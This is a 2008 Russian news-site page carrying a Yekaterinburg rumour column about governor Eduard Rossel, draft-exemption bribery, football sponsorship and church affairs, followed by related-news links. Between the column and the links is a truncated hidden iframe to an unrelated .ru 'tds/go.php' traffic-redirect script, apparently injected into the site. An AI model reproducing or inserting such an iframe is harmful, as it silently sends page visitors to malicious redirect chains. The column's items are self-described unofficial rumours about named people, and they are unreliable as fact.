15.08.2008, 16:14

Слухи и версии, 15 августа

Эдуард Россель готовится к новой войне с мэрами
Говорят, что Эдуард Россель с чрезвычайным воодушевлением воспринял свое включение в президиума Совета при Президенте РФ по развитию местного самоуправления. Впрочем, по неофициальной информации, возможность содействовать развитию местных сообществ руководитель области воспринял весьма своеобразно.
Как уверяют слухмейкеры, губернатор вновь загорелся своей старой идеей об отмене прямых выборов глав городов и районов и рассчитывает с помощью новой трибуны убедить в необходимости такого шага руководство страны. Говорят, что в связи с этим Россель уже активно интересуется графиком работы Совета, рассчитывая выступить с докладом по этой теме в самое ближайшее время.
«Белый билет» в Екатеринбурге подорожал в два раза
Говорят, что благодаря осетино-грузино-российской войне прекрасный шанс обогатиться получили «оборотни» в погонах и белых халатах. По неофициальной информации, цена гарантированного «откоса» от службы в армии с помощью врачей и сотрудников военкомата выросла почти вдвое.
Как уверяют слухмейкеры, родители потенциальных срочников, несмотря на все уверения Минобороны в том, что в «горячие точки» их детей никогда не пошлют, так напуганы неожиданной воинственностью нового президента, что готовы платить любые деньги, лишь бы избежать даже самых теоретических рисков.
«Уралу» ищут нового спонсора
Говорят, что причиной затянувшейся личной встречи Эдуарда Росселя, Гуса Хиддинка и московских чиновников от спорта стало настойчивое стремление губернатора подыскать футбольному «Уралу» нового спонсора. По неофициальной информации, плохо разбирающийся в футболе и во всей околоспортивной кухне губернатор решил использовать момент и понять, что происходит в кулуарах спорта № 1.
Как уверяют слухмейкеры, Россель до сих пор находится под впечатлением от проблем с хоккейным «Автомобилистом» и хочет быть уверенным в том, что перебоев с финансированием не будет хотя бы у футболистов, ведь нынешний спонсор клуба владелец Трубной металлургической компании Дмитрий Пумпянский неоднократно намекал на то, что с радостью сбросил бы с себя эту социальную нагрузку.
Горожане не хотят покупать жилье рядом с храмами
Неприятную для епархии тенденцию отметили риелторы Екатеринбурга: с увеличением числа православных храмов возросло и количество граждан, категорически не желающих приобретать квартиры вблизи от культовых сооружений. По неофициальной информации, фраза «окраины и квартиры рядом с церквями не предлагать» уже стала реальностью.
Как уверяют слухмейкеры, частный и громкий колокольный перезвон не готовы терпеть даже счастливые обладатели самых прочных стен и качественных стеклопакетов, о чем они открыто говорят специалистам по недвижимости.
УГМК может отказаться содержать монастырь на Ганиной Яме
Говорят, что начавшийся в УГМК «сброс» с баланса холдинга объектов социальной сферы может коснуться и Екатеринбургской епархии. По неофициальной информации, компания может отказаться от содержания храмового комплекса на Ганиной Яме.
Как уверяют слухмейкеры, такой вариант развития событий вполне реален, хотя о причинах его, зная набожность братьев Козицыных, распространяются весьма расплывчато. Говорят то о некоем конфликте с церковью вокруг земли в районе Вознесенской горки, то просто о плохом настроении гендиректора УГМК: цены на медь на мировом рынке снижаются, а аппетиты церкви, напротив, растут.
<iframe src="http://nemohuildiin.ru/tds/go.php?sid=

Похожие новости по теме
02.04.2010, 16:24

Слухи и версии, 2 апреля

Архиепископ Викентий может получить взыскание Говорят, что скандал со строительством храма на площади Труда может выйти боком архиепископу Екатеринбургскому и Верхотурскому. По неофициальной...

11.09.2009, 15:40

Слухи и версии, 11 сентября

Эдуард Россель готов отказаться от последнего Говорят, что Эдуард Россель в борьбе за должность губернатора Свердловской области готов отказаться от последних своих «завоеваний»...

10.07.2009, 16:53

Слухи и версии, 10 июля

Эдуард Россель и Александр Левин решили поэкспериментировать над Виктором Кокшаровым Говорят, что решение губернатора Эдуарда Росселя и главы его администрации Александра Левина уйти в отпуск...

18.07.2008, 16:20

Слухи и версии, 18 июля

Алексий II обиделся на Росселя Говорят, что еще одним влиятельным врагов в Москве у Эдуарда Росселя стало больше. По неофициальной информации, руководство РПЦ и лично патриарх Алексий II не поняли...

27.06.2008, 15:30

Слухи и версии, 27 июня

Михаил Максимов может стать премьером Говорят, что Михаил Максимов остался едва ли не единственным человеком в кабинете Виктора Кокшарова, искренне желающим возглавить областное правительство. По...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам